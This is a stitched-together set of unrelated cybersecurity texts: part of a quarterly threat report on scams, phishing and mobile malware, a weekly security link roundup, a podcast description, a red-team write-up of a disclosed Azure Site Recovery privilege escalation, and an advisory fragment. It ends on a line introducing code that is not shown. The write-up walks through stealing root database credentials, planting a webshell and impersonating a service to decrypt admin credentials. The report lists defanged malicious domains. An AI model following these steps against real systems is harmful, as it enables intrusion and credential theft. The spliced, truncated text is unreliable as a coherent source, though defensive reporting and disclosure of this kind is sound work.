Our data again shows that sites offer deals and then sending push-notifications are contributing significantly to this trend. With this in mind, we again urge everyone to always consider from which website you want to allow to send you notifications. Also remember that scammers try to disguise these offers of sending notifications as, for example, video players or as adult confirmations.
If you, unfortunately, allow access to malicious notifications, you may encounter the situation shown below.Β
Example of scam push-notifications
The increasing use of malvertising and push-notifications by scammers only confirms our predictions for 2024, when we repeatedly warned that this is a global threat with huge risk potential, especially on mobile phones.
If we look at activity in specific countries, we see that Ukraine exhibited the most significant surge in risk ratio, with a concerning 97% increase (the overall risk ratio for first quarter is set at 16.51%).Β
Example of scam targeting Ukraine users
Similarly, Kazakhstan and Uzbekistan displayed significant jumps in their risk ratios, +89% and +56% respectively, marking these countries as emerging hotspots for scam-related threats with overall risk ratios of 14.24% and 12.45%.
If we look further, we see interesting data for India, which also saw an increase in scam threats The current risk ratio for India is 17.26% with a quarter-over-quarter risk ratio increase of +24%.
We identified the highest scam risk ratio Georgia and Serbia in Q1/2024, with more than 30% risk ratio. In the absolute numbers, the majority of scam-targeted users were in France, Brazil, and the US.
Scam Delivery via Video
In Q1/2024 we continued to witness scam authors heavily using videos as lures in their scams. Whether video made from stock footage or an elaborate deep fake video, scammers are using all video varieties in their threats. One of the most widespread techniques involved exploiting famous individuals and significant media events to attract large audiences. As a result, scammers have devised enticing schemes that capitalize on the familiarity of well-known personalities and important world events.
An increasingly common feature of these campaigns is the use of deep fake videos, created by hijacking official videos from events and using AI to manipulate audio synchronization. These videos seamlessly blend altered audio with existing visuals, making it harder for the untrained eye to tell theyβre anything but authentic. Moreover, scammers insert QR codes, leading to well-designed web pages, that promise exclusive opportunities, luring victims into further engagement.
Deep fake videos abusing official videos
Cryptocurrency scams of this type are particularly increasing. Once an individual moves from the video lure to the fraudulent website, they are presented with different scenarios for obtaining βbeneficialβ cryptocurrencies. Victims are fooled into believing that participating in these schemes will bring considerable profits. The scammers consistently promise victims the same profit margin, and victims receive the impression that β by sending any amount of cryptocurrency to specific wallets β they will receive double the amount in return. The websites even implement fake online wallet monitoring, imitating legitimate transaction activity. Additionally, these deceptive sites typically include images of well-known personalities and logos associated withΒ authenticΒ cryptocurrency-related companies, adding an air of legitimacy.
However, the most significant cryptocurrency scam incident of the quarter was the misuse of the Starship Integrated Flight Test 3 (IFT-3). The attackers used the official SpaceX All Hands meeting video to deceive viewers and get them to visit the fraudulent websites. Moreover, the attackers have hijacked several YouTube channels, which have tens of millions of subscribers, to increase the probability of displaying a fake video in the list of recommended videos.
Deep fake videos abusing SpaceX events
The preliminary analysis indicates that specific attackersβ wallets associated with these scamsβ campaigns have cashflows reaching tens of thousands of dollars.
The risk ratio of this financial scam was stable in Q1/2024, but we recorded a significant peak on March 14, 2024, related to the IFT-3 event.
Risk ratio of the crypt giveaway scam in Q1/2024
In terms of country distribution, the leading countries affected by the scammer group are the United States, the United Kingdom, and Germany.
Country distribution of the crypt giveaway scam threat
Dating Scams Skyrocketing
Dating scams, also known as romance scams or online dating scams, involve fraudsters deceiving individuals into fake romantic relationships. Scammers adopt fake online identities to gain the victimβs trust, with the ultimate goal of obtaining money or enough personal information to commit identity theft.
The last quarter of last year was very interesting for dating scams, with several large campaigns witnessed through our data. In Q1/2024, we saw a significant increase since the middle of February.Β
What is interesting is the high activity especially in Central Europe, with countries like Hungary, Slovakia, Denmark, Austria or the Czech Republic being the most affected.
Activity of Dating scam in Q1/2024
Once again,Β these threats are strongly supported by advertising campaigns. We often see that the sources of these advertising campaigns are sites with adult content. On such pages, the owners often try to get as much commission as possible by trying to fit advertising on their sites with almost every interaction on the page. The user is often overwhelmed with pop-ups or new window redirects, usually to dating scam sites.
Example of prevalent dating scam example from Poland
As you can see on the map, Hungary leads with the highest risk ratio rate at 5.06%. Following closely are Slovakia and Luxembourg, with risk ratios of 4.72% and 4.57% respectively.
Germany and Austria also show significant exposure to dating scams, with risk ratio rates of 4.27% and 4.10% and lastly, Czechia, with a risk ratio of 3.94%, rounds out the list.
Global risk ratio for Dating scam in Q1/2024
Tech Support Scams (TSS): Steady Increase of AttacksΒ
Tech support scam threats involve fraudsters posing as legitimate technical support representatives who attempt to gain remote access to victimsβ devices or obtain sensitive personal information, such as credit card or banking details. These scams rely on confidence tricks to gain victimsβ trust and often involve convincing them to pay for unnecessary services or purchase expensive gift cards. Itβs important for internet users to be vigilant and to verify the credentials of anyone claiming to offer technical support services.
Throughout 2023, we observed a continual drop in activity related to tech support scams. In the first quarter of this year, we can say that this trend not only ended but quite the contrary β we observed an increase in tech scam activity over the quarter.
Β Daily risk ratio of Technical Support Scam in Q4/2023 and Q1/2024Β
As seen on the chart above, the activity of this threat has reached the level of the beginning of Q4/2023.
Looking at the data of the full quarter, a clear increase trend is visible.
Β Detail of Technical Support Scam risk ratio in Q1/2024
Switzerland experienced the most dramatic surge, with a 177% increase in TSS activityβthe highest observed this quarter. Austria also saw a significant rise, with a 101% increase. Germanyβs increase, though lower, was still notable at 65%. Additionally, Japan, traditionally a hotspot for TSS, reported a significant increase of 153%.
These escalating figures, especially notable in Europeβs wealthier nations, highlight a growing trend in cybersecurity threats in these regions.
Global risk ratio for Technical Support Scam in Q1/2024
Refund and Invoice Scams: iCloud Data Deletion Scam
Invoice scams involve fraudsters sending false bills or invoices for goods or services that were never ordered or received. Scammers rely on invoices looking legitimate, often using company logos or other branding to trick unsuspecting victims into making payments. These scams can be especially effective when targeted at businesses, as employees may assume that a colleague made the purchase or simply overlook the details of the invoice. Itβs important to carefully review all invoices and bills before making any payments and to verify the legitimacy of the sender if there are any suspicions of fraud.
One of the refund and invoice scams that caught our attention in Q1/2024 targeted a top-tier service, serving as a gateway to other less valuable ones, in our assessment. The targeted account was iCloud, accompanied by a TinyURL link to a payment gateway that extracts user information, including sensitive details. iCloud is undoubtedly one of the most vital accounts to protect by enabling multi-factor authentication in order to prevent malicious actors from stealing sensitive information. According to 9to5 Google, enabling multi-factor authentication for Google users led to a 50% decrease in compromised accounts.
We will delve into the campaign itself which begins with a malicious email, which may evoke early 90βs nostalgia because the attackersβ Comic Sans font choice. The aim of the email is to visually intimidate, highlighting the issue at hand: your beloved photos will be deleted unless you proceed to the fake payment gateway. As always, the loading bar creates a sense of urgency, while a missed payment statement compounds the pressure. A big red button labeled βFULLβ completes the sense of urgency, signaling that immediate action is required.
The email seemingly contains additional product and technical information to make it look authentic, all of which is fabricated. These include product IDs, expiration dates, and buttons for more storage. The only legitimate piece of the email is the unauthorized use of the actual iCloud logo. The subject of the email is also intriguing: weβre seeing that more cybercriminals aim to catch your attention with email subject lines using emoticons, as you see in the email sample below.
Example of iCloud-themed email scam used in Q1/2024
In terms of global prevalence, we can see that the English-speaking world is the most affected, along with the European Union. The countries that experienced the biggest spike in the last quarter are Belgium, up by 29%, the United Kingdom, up by 13%, and Luxembourg, up by 10%. On the other side of the spectrum, we have Australia, which experienced the largest drop, down by 29%, the United States, down by 15%, and Canada, down by 5%.
Global risk ratio for Refund and Invoice scam in Q1/2024
The graph showing risk ratio over time exhibits less volatility compared to the previous period. In Q1/2024, the risk did not significantly change over time and rose slightly by the end of the quarter. We can observe that the threat is still widely spread around the globe, and we anticipate seeing even more of these attacks in the future.
Daily risk ratio of Refund and Invoice scam in Q4/2023 and Q1/2024
Phishing: Reaching New Hights
Phishing is a type of online scam where fraudsters attempt to obtain sensitive information including passwords or credit card details by posing as a trustworthy entity in an electronic communication, such as an email, text message, or instant message. The fraudulent message usually contains a link to a fake website that looks like the real one, where the victim is asked to enter their sensitive information.
And now we come to the final, and most classic,Β category under web threats: Phishing. Like nearly all web threats, this category saw an increase in activity in Q1/2024, continuing the increase trend that weβve witnessed over the last four quarter.Β
Risk ratio of Phishing during the last 12 months
Weβve also observed that attackers are continuing to make heavy use of file sharing via InterPlanetary File System (IPFS) infrastructure β to spread their phishing content.
Example of prevalent phishing hosted on IPFS infrastructure
Our statistics show that the most frequently targeted brand on IPFS is Microsoft, which currently accounts for up to 20% of blocked attacks. At the same time, we see that these threats were most visible at the end of Q1/2024.
Activity of IPFS based domains for Q1/2024
Global risk ratio for phishing in Q1/2024
One of the most interesting phishing campaigns for this quarter was the wave of Russian-language phishing PDFs targeting bank users.Β
Based on the content of the PDF, this campaign was developed to target the customers of Tinkoff Bank, and from the data we can see that the most hits are registered in Latvia.
Phishing email template
One of designs of phishing PDF
This campaign generated hundreds of PDF samples, with different names, while the appearance mostly stayed the same. All extracted URLs pointed to the same domain.
Extracted malicious URLs
The main domain to which the URL is redirected is xsph[.]ru. This domain acts as a hub for many other types of malware.Β
Captcha for verification
A command-and-control server, such as one hosted at βthe-packaging-experts[.]co.ukβ could be accessed by malicious programs by abusing this event. This then redirects to βhttp://a0942143[.]xsph[.]ru/tin/cabinet/capcha/β and checks CAPTCHA to verify that the user is human, then potentially receives instructions or downloading additional payloads. Threat actors frequently employ this strategy to avoid being discovered by security solutions, using a genuine website as a front for criminal activity.
Illustration of the malware relationship linked to xsph[.]ru
The first quarter of 2024 brings with it several interesting developments within the mobile threat landscape. Adware has once again snuck into the PlayStore, this time in the form of a Minecraft clone game app. Meanwhile, MoqHao, a revived strain of banker, obtained the ability to auto-start on victimsβ devices once installed, displaying phishing messages on the target device. We also saw GoldPickaxe target both Android and iOS users in Vietnam and Thailand, attempting to steal facial recognition biometrics that are then used in fraudulent payments.
State sponsored spyware was also brought back into focus with governments investigating the scope of its use on citizens, while Apple highlighted its threat notifications sent to victims of these sophisticated spywares.Β
Fake romance lures were also found, this time by VajraSpy, to entice victims into installing a spyware in India and Pakistan with the intent of extracting data and spying on their devices.
Finally, SpyLoans continue to spread on and off the PlayStore, enticing users with promises of quick cash but instead targeting them and their contacts with harassment and blackmail.
Web Threat Data within the Mobile Landscape
Over the last few quarters, weβve started to include web threat data in our mobile threat telemetry.Β Scams are again at the top of the threat list in the mobile sphere, with a 61% increase in risk ratio compared to last quarter. This is followed by phishing and malvertising, both seeing a 19% increase in risk ratio. The increased prevalence of web threats has significantly reduced the risk ratio of traditional on-device malware such as adware, droppers and others.
Graphs showing the most prevalent threats in the mobile sphere in Q1/2024
Most blocked attacks on mobile devices in Q1/2024 were web-based, mirroring the previous quarter. Users are much more likely to encounter phishing websites, scams, malvertising and other web threats than ever before. These threats can come in a variety of formats such as private messages, SMS, and emails but also redirects on less reputable sites, unwanted pop ups and through other avenues.
In contrast to these types of mobile scams, traditional on-device malware requires a more complex infection vector where the user must also install the malware. For proper functionality of most mobile malware, permissions need to be granted by the user first, which again lowers the chances of malicious activity being triggered.
Hence, blocking web-threat based attacks is beneficial for the security of mobile devices, as malware actors often use them as an entry point to get the payload onto the mobile device of their victims.
Adware Sneaks into the PlayStore Again
Adware threats on mobile phones refer to applications that display intrusive out-of-context adverts to users with the intent of gathering fraudulent advertising revenue. This malicious functionality is often delayed until sometime after installation and coupled with stealthy features such as hiding the adware app icon to prevent removal. Adware mimics popular apps such as games, camera filters, and wallpaper apps, to name a few.
Adware stays on top this quarter as the most prevalent on-device malware threat facing mobile users. Continuing to bring in fraudulent advertising revenue at the expense of the user experience of its victims, it again makes its way into the PlayStore to increase its global spread. We also observe third party stores distributing older adware families that are no longer present on the PlayStore.
HiddenAds are the most common type of adware this quarter, often hiding their icons once installed on victimsβ devices or performing hidden actions in the background with the intent of gathering fraudulent ad views, unbeknownst to the victim. FakeAdBlockers and Mobidash are close behind, often masking as re-packed games that bring with them full screen out of context ads or spam notifications that bother their victims. These continue to spread through third party apps stores and malvertising on less reputable sites that redirect users to download these types of adware.
Minecraft clone game apps that display hidden advertisements, raking in fraudulent ad revenue
Of note this quarter is the resurgence of a previously discovered adware discussed in the Q2/2023 report, again appearing in the PlayStore with altered versions of the original adware. These Minecraft clone apps draw in millions of downloads due to the popularity of the original game, then proceed to exploit advertising SDKs to display adverts in the background, raking in ad revenue. This fraudulent activity impacts the advertising ecosystem on mobile devices and contributes to data and battery drainage on the victimβs device.
We see a significant decrease in risk ratio this quarter in mobile adware. SocialBar has mostly subsided in comparison to last quarter, accounting for the lower numbers. Alongside this, HiddenAds, FakeAdBlockers, and Mobidash have all experienced a drop in risk ratio this quarter.
Global risk ratio of mobile adware in Q4/2023 and Q1/2024
Brazil, India and Argentina have the most protected users this quarter, as was the case last quarter. Egypt, Philippines and Oman have the highest risk ratios, meaning users are most likely to encounter adware in these countries, according to our telemetry.
Global risk ratio for mobile adware in Q1/2024
New Auto-Starting Bankers Threaten Mobile Users
Bankers are a sophisticated type of mobile malware that targets banking details, cryptocurrency wallets, and instant payments with the intent of extracting money. Generally distributed through phishing messages or fake websites, Bankers can take over a victimβs device by abusing the accessibility service. Once installed and enabled, they often monitor 2FA SMS messages and may display fake bank overlays to steal login information.
Mobile bankers expanded their feature set in Q1/2024 with an unexpected evolution: the ability to auto-start after installation without the need for user input, as exemplified by MoqHao banker. Elsewhere, bankers are digging for gold with the new GoldPickaxe strain that targets both Android and iOS users, attempting to steal facial recognition data for further fraudulent use while emptying bank accounts. Finally, the GreenBean banker was used to redirect crypto payments by changing wallet addresses in victimβs messages. In our telemetry, we see Cerberus/Alien and BankBot with the most protected users, while RewardSteal banker makes a big splash coming in third, mainly targeting India.
Disguised as the Chrome browser and using Unicode characters to evade detection, MoqHao requests access to SMS messages
We see another comeback with upgrades, as the MoqHao banker introduces the ability to auto execute after installation through using Androidβs inbuilt Contact Provider service. By having this as the first activity in the app manifest with special metadata, it is executed as soon as the app is installed, enabling it to trigger malicious services before it is run for the first time by the user. Once installed and running, MoqHao starts to display phishing messages attempting to trick the user into providing their banking details. It also harvests contact details and SMS messages and sends these away to a C&C server. Interestingly, while the banker has preset country specific phishing messages, it can also dynamically load messages from Pinterest profile descriptions specifically setup for this purpose, a very odd way of delivering tailored messages to its victims. The banker has been distributed through fake phishing SMS messages, often pretending to be a delivery service and mostly targeting users in Japan, South Korea, Germany, France, and India.
GoldPickaxe using the guise of Thai Digital Pensions within TestFlight to trick users into installing the banker on iOS
GoldPickaxe, a banker targeting both Android and iOS, has emerged and is targeting victims in Thailand and Vietnam. Likely from the same threat actors behind GoldDigger, a previously discussed banker, this new strain focuses on extracting personal information and can even harvest facial recognition data for fraudulent access to victimβs bank accounts. This is likely in response to both the Bank of Thailand and the State Bank of Vietnam issuing statements advising or mandating the use of facial biometric verification for payments in the coming months.Β
On iOS, the threat actors initially used TestFlight, a beta testing tool within the iOS ecosystem, to distribute the iOS malware. Once Apple took down the offending banker apps, they switched to using Mobile Device Management (MDM) profiles, sending download links to victims. If the victim downloaded and installed the MDM profile, the banker would gain complete control over the device. After the complex infection process is complete, GoldPickaxe can extract photos, SMS messages and even request to capture the victimβs ID card and face. These are then used to initiate fraudulent bank payments, with reports of victims losing significant sums of money after being asked to do facial recognition scans by GoldPickaxe.
Fake crypto website used to distribute the GreenBean banker malware
A new banker called GreenBean has been spotted spreading through a fake cryptocurrency website. Targeting users in China and Vietnam, the banker focuses on cryptocurrency wallets and payment platforms as well as traditional banking platforms. It uses the Accessibility service to gather sensitive information, login details, photos and saved wallet passwords, then sends these away to its C&C. GreenBean is also able to dynamically detect and change crypto wallet addresses it detects within messaging applications such as WeChat, redirecting a payment to its own wallet address, stealing money from victims. Additionally, the banker can stream video from the infected device, keeping an eye on its victims and potentially gaining access to sensitive information.
Global risk ratio of mobile bankers in Q4/2023-Q1/2024
Breaking the trend of decline from previous quarters, bankers mostly maintain their prevalence this quarter. It is likely that the introduction of various new strains this quarter has contributed to their steadying numbers. We also observed the return of SMS and messaging applications as infection vectors, used by strains such as FluBot in the past.
Global risk ratio for mobile bankers in Q1/2024
Turkey has the highest risk ratio for bankers in Q1/2024. We also witnessed a notable rise in risk ratio in India, where the RewardSteal banker is gaining ground. It appears the focus this quarter has shifted towards Asia, with countries such South Korea, Japan, Thailand and Vietnam being the targets of several new strains of bankers.
State Sponsored Spyware Continues to Be a Sophisticated ThreatΒ
Spyware is used to spy on unsuspecting victims with the intent of extracting personal information such as messages, photos, location, or login details. It uses fake adverts, phishing messages, and modifications of popular applications to spread and harvest user information. State backed commercial spyware is becoming more prevalent and is used to target individuals with 0-day exploits.
Mirroring last quarter, Spymax is the most prevalent strain of spyware this quarter, followed by RealRAT, SexInfoSteal, and malicious WAMods. We also saw a few new spyware entries this quarter alongside the return of updated existing strains. Of note are official Apple threat notifications sent to affected users with iOS devices, alerting them when they have been targeted by state sponsored sophisticated spyware attacks. We see VajraSpy spreading in the PlayStore, targeting victims in Pakistan with the ability to steal sensitive data. DogeRAT, a repurposed RainbowRAT clone, makes another entrance on Github with updated and paid features. Finally, SpyLoans continue their blackmailing streak on and off the PlayStore, threatening users worldwide.
A sample Threat notification from Apple, alerting the user that they have been targeted by mercenary spyware
News of state sponsored spyware has been doing the rounds for at least a decade now, with examples such as the infamous NSO Group Pegasus dating back to 2016, discussed in the Q3/2021 report. Since 2021, Apple has started issuing threat notifications to potential victims, alerting them if they have been targeted by what Apple believes to be state sponsored or mercenary spyware. These attacks are often highly sophisticated, sometimes using multiple zero-day exploits to break into iOS devices without user interaction, with the intent of spying on their victims and extracting personal information such as SMS messages, contacts and photos. There has been more focus on the use of such spyware by governments, with Poland recently launching a probe into the use of Pegasus by the government, which allegedly targeted close to 600 individuals in Poland. Due to the high cost of such attacks, the attackers are targeting only individuals of interest, NGOs, etc. Users should take extra precautions, such as enabling Lockdown mode on iOS devices and keeping their device up to date with latest security updates.
VajraSpy pretending to be a dating app, sent to the victim through a romance lure
VajraSpy, an upgraded spyware seen in previous years, has made it onto the PlayStore, targeting users in India and Pakistan. Masquerading as messaging and dating apps, victims were likely approached under the guise of a romantic encounter, where threat actors encouraged victims to download the spyware apps to continue their interaction. It appears there were three distinct versions of the malware, two of which were messaging applications with the ability to extract SMS messages, WhatsApp conversations and photos, the more advanced version even able to record audio and video, log keystrokes, and listen in on phone calls. The third version disguised itself as a news app and didnβt request any dangerous permissions. Despite this, it was able to steal contacts and various documents and files from external storage.
DogeRATβs list of paid features on Github with ambitious promises such as βundetectable by antivirusβ
Github is again being used for distribution of potential malware in this case DogeRAT. This update appears to be a repurposed version of RainbowRAT, and even features a paid version that promises to be undetectable by antivirus in addition to having the ability to extract all photos on a device, screenshot the victimβs screen and provide a keylogger to track inputs. While dangerous, open repositories such as this one offer an interesting insight into the operation of various threat actors. Normally, threat groups try to hide their activity to evade detection and remain under the radar for as long as possible to avoid takedowns and antivirus detection.
Review of a SpyLoan application on the PlayStore, citing the abusive use of contacts and data theft which is used to coerce victims
SpyLoans continue to reign on the PlayStore, targeting victims in need of quick cash with promises of easy payments, low interest rates and hassle-free setup. Numerous apps have been taken down from the PlayStore, as discussed in previous quarters, but new ones keep popping up. The actors behind these apps have also taken to using third party app stores or even direct messaging to entice victims into downloading their malware. Once installed, the SpyLoans generally harvest contacts, photos and SMS messages under the guise of a credit check. This data is then used to harass and blackmail victims, in some cases even threating violence. Users are advised to stick to official banks when in need of a loan, to avoid SpyLoan apps.Β
Global risk ratio of mobile spyware in Q4/2023 and Q1/2024
The risk ratio for mobile spyware has remained steady compared to Q4/2023, with a very slight decrease in prevalence of spyware in our telemetry. The continued spread of SpyLoans may have contributed to this.
Global risk ratio for mobile spyware in Q1/2024
Yemen has the highest risk ratio this quarter, followed by Turkey, Egypt and Pakistan. We saw VajraSpy mainly focus on Pakistan this quarter, where we do see an increase in risk ratio. Brazil and the US have the highest number of protected users.
Jakub VΓ‘vra, Malware Analyst
Malware researchers
Adolf StΕedaΒ Alexej SavΔinΒ David Γlvarez David JursaΒ Igor MorgensternΒ Jakub KΕoustekΒ Jakub VΓ‘vraΒ Jan RubΓnΒ Jan VojtΔΕ‘ekΒ Ladislav ZezulaΒ Luigino CamastraΒ Luis CorronsΒ Martin ChlumeckΓ½Β MatΔj KrΔmaΒ Michal SalΓ‘tΒ OndΕej MokoΕ‘Β Prabhakaran Ravichandhiran VladimΓr Ε½alud
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-05-06 to 2024-05-13.
A joint statement from UniSuper CEO Peter Chun, and Google Cloud CEO, Thomas Kurian - When the Google Cloud CEO has to make a statement, you know it's a big deal. UniSuper, an Australian superannuation fund, had their entire Google Cloud account deleted in "an isolated, one-of-a-kind occurrence." They were saved only because they kept a backup totally outside of Google Cloud. This will be a wild one for your tabletop exercises.
How Did Authorities Identify the Alleged Lockbit Boss? - Last week global law enforcement arrested the alleged leader of the LockBit ransomware gang (known online as "LockBitSupp"). Krebs has the details on how they tracked him down.
Marshal Like a Boss With Reflective Loading in C# - This post shows how reflective loading can be combined with storing a DLL in resources to marshal functions from it into managed runtime without the need of dropping any artifacts on disk.
Custom Beacon Artifacts - Blog post explaining how to create custom Beacon artifacts for Cobalt Strike by modifying and building executable templates in C++ and Rust, allowing for the injection and execution of Beacon shellcode in memory without detection.
When "Phish-Proof" Gets Hooked - How a red team revealed a vulnerability in Okta FastPass, by exploiting the transition from the Loopback flow to the Custom URL flow, bypassing anti-phishing protections. So much Okta tradecraft lately.
Today I Learned - Zsh History Timestamps - In Zsh, commands executed during a session are logged with timestamps, but these timestamps reset upon reboot or session closure, making it useful for incident response in systems where Zsh is the default shell.
Abusing Azure Logic Apps - Part 1 - Looking forward to this series. How attackers can abuse storage account privileges linked with a logic app to gain unauthorized access, execute system commands, and create workflows, focusing on the relationship between logic apps and storage accounts.
Bypassing WAFs to Exploit CSPT Using Encoding Levels - How to exploit Client Side Path Traversal (CSPT) vulnerabilities by bypassing Web Application Firewalls (WAFs) using different encoding levels to execute attacks such as cross-site scripting (XSS).
Kerberos Delegation Test App - Rasta built a ASP.NET Core to understand Kerberos protocol by capturing and decrypting real traffic.
Digging for SSRF in NextJS apps - The blog post explores the potential for SSRF vulns in NextJS applications due to misconfigurations, particularly focusing on the _next/image component and demonstrating how attackers can exploit these weaknesses to perform SSRF attacks, including a detailed explanation of bypassing security measures and a newly discovered SSRF vulnerability that was assigned CVE-2024-34351.
Hacking Apple - SQL Injection to Remote Code Execution - Researchers from ProjectDiscovery identified a critical SQL injection vulnerability in Apple's Book Travel portal using Mura/Masa CMS, led to RCE, and responsibly disclosed it. Wicked!
Poisoning Pipelines: Azure DevOps Edition - DevOps and CI/CD solutions have come under fire recently, and this post shows how to abuse Azure DevOps to execute arbitrary code.
Emulation with Qiling - Qiling has some cool features, like the ability to fake file systems, hook functions, and even modify registers on the fly. This post shows how to use Qiling to emulate NEXXT Polaris 150 travel router.
XZ Utils Made Me Paranoid - If you too are paranoid due to the XZ backdoor incident, check out VerifyELF a tool to validate that there are no hooks installed into the running processes, and if there are to print out that there is and what offset the first difference is, or print out all differences.
Tools and Exploits
IconJector - Unorthodox and stealthy way to inject a DLL into the explorer using icons.
TrollDump - Injects a 64-bit managed DLL into a 64-bit managed or unmanaged process using setwindowshook.
grype - A vulnerability scanner for container images and filesystems.
parsnip - Parsnip is a program developed to assist in the parsing of protocols using the open source network security monitoring tool Zeek.
vulnrichment - A repo to conduct vulnerability enrichment.
ImmoralFiber - Fibers are an optional and largely undocumented component of the Windows operating system, existing only in user mode.
IPPrintC2 - PoC for using MS Windows printers for persistence / command and control via Internet Printing.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
Raspberry Pi Connect - "...a secure and easy-to-use way to access your Raspberry Pi remotely, from anywhere on the planet, using just a web browser."
gcp-iam-brute - GCP IAM Brute is a tool that leverages the testIamPermissions feature in Google Cloud Platform (GCP) to perform fuzz testing for different permissions within GCP.
stalker - Stalker, the Extensible Attack Surface Management tool.
cloudmapper - CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
waymore - Find way more from the Wayback Machine, Common Crawl, Alien Vault OTX, URLScan & VirusTotal!.
Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.
Today on Cyber Work, weβre talking about last Septemberβs breach of the MGM Grand Casino chain, an attack that lead to a week of tech failure, downtime and over a hundred million dollars in lost revenue. The attackers were able to get in via a point that my guest, Aaron Painter of Nametag Inc, said is a common point of failure: the request for a password and credential reset from the helpdesk, and the ever-frustrating βsecurity questionsβ approach to making sure you are who you are. Nametag is built to create an alternative to security questions and go beyond MFA to create a method of verification that is even resistant to AI Deepfake attempts!Β
This conversation goes into lots of interesting spaces, including career mapping, the importance of diverse design teams and the benefits of security awareness training, plus you get to learn about an amazing piece of emergent tech!
0:00 - A new method of online verification 3:15 - First getting into cybersecurity and computers 7:03 - Aaron Painter's work experiencesΒ 10:37 - Learning cybersecurity around the world 11:32 - Starting Nametag 16:25 - Average work week as Nametag CEO 19:10 - Cybersecurity learning methods 21:15 - The MGM cyberattack explained 26:07 - MGM fail safes bad actors surpassedΒ 29:26 - Security awareness trainingΒ 31:35 - Are data breaches the new normal 34:05 - How Nametag safeguards online data 37:59 - AI deepfakesΒ 40:19 - Using Nametag 42:20 - How to learn AI deep fake defense 44:14 - Design choices in digital identityΒ 45:54 - Different backgrounds in cybersecurityΒ 46:59 - Aaron Painter's favorite part of his work 48:01 - Best cybersecurity career advice 49:00 - Learn more about Nametag 50:06 - Outro
β Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free β View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
About Infosec Infosecβs mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQβs security awareness training. Learn more at infosecinstitute.com.
Adversary Academy recently completed a long-term red team (assume breach) assessment for a large restaurant franchise. While performing the assessment an Azure Site Recovery server was found to be an attractive target in the environment. Part of our service offering is our targeted vulnerability research (TVR) program. The challenge Iβve seen with most pentest or redteam providers is that there is typically a lack of vulnerability and exploit research capabilities. Meaning if there are not known vulnerabilities with public exploit code affecting a network or environment the pentest provider can't find exploitable systems. Pentest providers typically lack full-time exploit and vulnerability development capabilities. In order to address that issue we run a program that allows our researchers to spend time attacking interesting systems theyβve encountered on customer networks, long after the engagement is overβ¦ or in this case during an engagement.
Typically on a penetration test a tester's βspidey sensesβ will go off at some point when you encounter a system that just feels vulnerable, or impactful if it were to be vulnerable. Our spidey senses went off when we gained access to an Azure Site Recovery (ASR) server because there appeared to be a large number of services communicating both inbound and outbound to the server as well as traffic to the customer's Azure environment. Documentation revealed that when fully deployed ASR has rights to read and write virtual machines from on-site VMware or Hyper-v systems and upload them to the Azure cloud for cloud-to-cloud disaster recovery.
Our customers ASR configuration
While performing the engagement the research phase began immediately and we discovered a number of interesting bugs on the SRM server after we gained access toΒ it.
Beginning our research we found that Azure SRM is site disaster recovery for one Azure region to another region or physical to theΒ cloud.
SRM can replicate on-premises hypervisors VMware, Hyper-V, physical servers (Windows and Linux), or Azure Stacks to AzureΒ sites.
Basically, Microsoft said, βWe will support anything other than AWS orΒ GCP!β
As we started our research we found roughly 20 previous CVEs affecting Microsoft Azure SRM, most were EoP and most were found in 2022. Hopefully, we could find something new.
Our research mindset typically includes mapping out application behaviors and what could go wrong with misconfigurations, logic flaws, or historically problematic issues (in this caseΒ EoP).
We started by reviewing features, capabilities, and processes in Azure SRM and foundΒ that:
the SRM process and config server runs a web server listening for replication events to the backup server on portΒ 9443
Process server must have permission to read all properties from all systems being backedΒ up
Process server must have the ability to read/write to Azure for synchronization, and deployment ofΒ agent
SRM server connects to clients via WMI/ credentials stored in theΒ DB
This WMI connection deploys the SRM mobility agent responsible for the agent to serverΒ comms.
Once this behavior was documented we decided that the web server privileges might be important, and the WMI credentials stored in the local database were definitely valuable targets to begin attacking.
Reviewing files accessed on startup by the services showed us that a config file named amethyst is read on startup. Here was the first bug weΒ found.
The configuration file is readable by any local user account on the SRMΒ server
The amethyst config file contains the plaintext mysql DB root username and password, this allows us to interact with the local database asΒ root.
Connecting to the mysql database we began to debug and monitor the mysql queries that were executed by the server. Here we found our attackΒ target.
The Azure SRM credentials are stored AES encrypted in the database. The encryption key is not readable by aΒ user.
We found php code responsible for executing the query that decrypts and uses the credentials we want access to. The first roadblock encountered is that we are not able to read the Encryption.key file as a standardΒ user.
After some research and failed attempts, we found a Solution!
If the process responsible for handling the php / mysql queries has access to the key, we must become theΒ process.
php-cgi reading the encryption.key
As our standard user account on the server, we donβt have the SeImpersonatePrivilege, we don't have an admin account on the server either. So we needed to find a bug affecting the webΒ server.
Further research allowed us to find a directory on the server where the web server / php code isnβt properly secured. We can write a webshell to this directory and βbecomeβ the web serverΒ process.
The web services are running as IUSR which DOES have the SeImpersonatePrivilege
Spawning a beacon as the IUSR user from our webΒ shell
We then can use SEImpersonatePrivilege to read the encryption.key
Impersonating the user we want to access the encryption.key
The final challenge was overcoming some weird character-handling behavior by MySQL which can't handle the characters in the encryption.key inline, so store it as a variable to use the key and decrypt the admin credentials.
After discovering the bugs and disclosing the credentials used by SRM the team was able to access the Vsphere environment, took snapshots of the domain controllers, and performed offline attacks to recover Enterprise and Domain admin access. After exploiting the issues we reported the vulnerability to Microsoft and received recognition for CVE-2024β21364 with a patch becoming available several monthsΒ later.
The application code contains a hard-coded JWT signing key. This could result in an attacker forging JWT tokens to bypass authentication.
Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.
The next piece of code implemented file encryption and decryption logic via previous functions:
